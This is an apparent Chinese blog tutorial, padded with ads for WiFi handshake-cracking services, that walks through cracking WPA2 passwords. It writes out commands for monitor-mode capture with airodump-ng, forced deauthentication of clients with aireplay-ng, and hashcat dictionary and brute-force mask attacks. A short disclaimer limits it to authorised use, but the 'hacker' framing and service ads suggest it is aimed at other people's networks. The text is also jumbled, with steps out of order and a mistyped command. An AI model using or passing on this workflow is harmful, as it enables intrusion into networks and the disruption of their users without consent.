黑客养成计划之HASHCAT破解Wifi

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 握手包跑包

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

hashcat破解wifi八位数字加英文

airmon-ng 启动 wlan0

请注意,本文仅供技术交流和学习使用,仅限于授权环境和个人环境,严禁用于任何未授权的恶意行为,尊重法律和隐私。

Hashcat是一款功能强大的密码恢复工具,也是少数可以与GPU配合使用的工具之一,提供多种从哈希值中查找密码的方法。它可以帮助我们恢复丢失或忘记的各种平台的密码,包括Windows、Linux和macOS。现在,让我们来看看如何使用Hashcat破解WiFi密码。

破解哈希值的最简单方法是尝试猜测密码。字典和暴力攻击是最常见的猜测密码方法。这些技术利用包含单词、短语、常用密码和其他可能用作密码的字符串的文件(例如社工库)。

首先,您需要使用以下命令将无线网卡设置为监控模式。

airodump-ng wlan0
CH  6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2022-05-20 11:10                                          
                                                                                                                                             

BSSID (用*代替)             PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                                                                                                 #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                                                                                                

*  -29       19        1    0   6  54e  WPA2 CCMP   PSK  xiaomi-SDXSEDSSD                            
*  -42       17        0    0   6  54e  WPA2 CCMP   PSK  Potian
*  -29       19        1    0   1 54e   WPA2 CCMP   PSK  TP-LINK                        
*  -42       17        0    0   11 54e  WPA2 CCMP   PSK  2403-5G                                                                                                                                                            

BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                                                                                                                    

*  *  -57    0 - 1      0        1  
airodump-ng --bssid *(使用自己扫描到的BSSID即可) -c 6 --write wpa-01 wlan0

您可以使用”iwconfig”命令查找无线接口名称,这里我们默认为0。

使用以下命令开始扫描附近的无线网络。这将显示范围内所有Wi-Fi路由器的数据表。为了演示目的,我将选择破解我的网络”Potian”的密码。打开另一个终端并输入来自网络的接入点MAC地址(BSSID)和通道:

hashcat破解wifi八位数字加英文

aireplay-ng -0 100 -a * -c * wlan0

–write wpa-01是写入数据的文件名,也是存储4次握手的文件名。

您可以使用”ls”命令查看该文件,稍后您需要将其转换为不同的格式才能破解密码。

WPA/WPA2使用4次握手来验证网络设备的身份,您可以在此过程中获取四次握手。打开另一个终端并输入:

CH  6][ Elapsed: 4 s ][ 2014-03-24 17:51 ][ WPA handshake: *

“WPA handshake:*”代表成功捕获

hashcat破解wifi八位数字加英文

-0表示取消验证。

100是解除认证数据包的数量。

-a是接入点的MAC地址。

-c是要解除身份验证的客户端的MAC地址。

在破解密码之前,您需要将.cap文件(wpa-01.cap)转换为hashcat文件格式.hc22000。通过将.cap文件上传到并将其转换为.hc22000格式。

hashcat –m 22000 wpa-01.hc22000 password.txt
haschcat –m 2200 –a 3 wpa-01.hc22000 ?l ?l ?l ?l ?l ?l ?l ?l ?l ?l

Hashcat有两种最常见的攻击方式:

字典攻击:除了hashcat之外,您还需要一个包含常用密码列表的单词表。使用以下命令开始破解过程:

暴力攻击:基于尝试每种可能的组合,随着密码长度的增加,可能的组合数量会急剧增加。使用以下命令:

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;?@[]^_`{|}~

-a 3表示您正在使用暴力攻击模式。

wpa-01.hc22000是转换后的.cap文件。

?l ?l ?l ?l ?l ?l ?l ?l ?l ?l是您的掩码,其中l表示小写字母。这意味着密码全部由小写字母组成。

Hashcat可以使用以下内置字符集:

赞(0)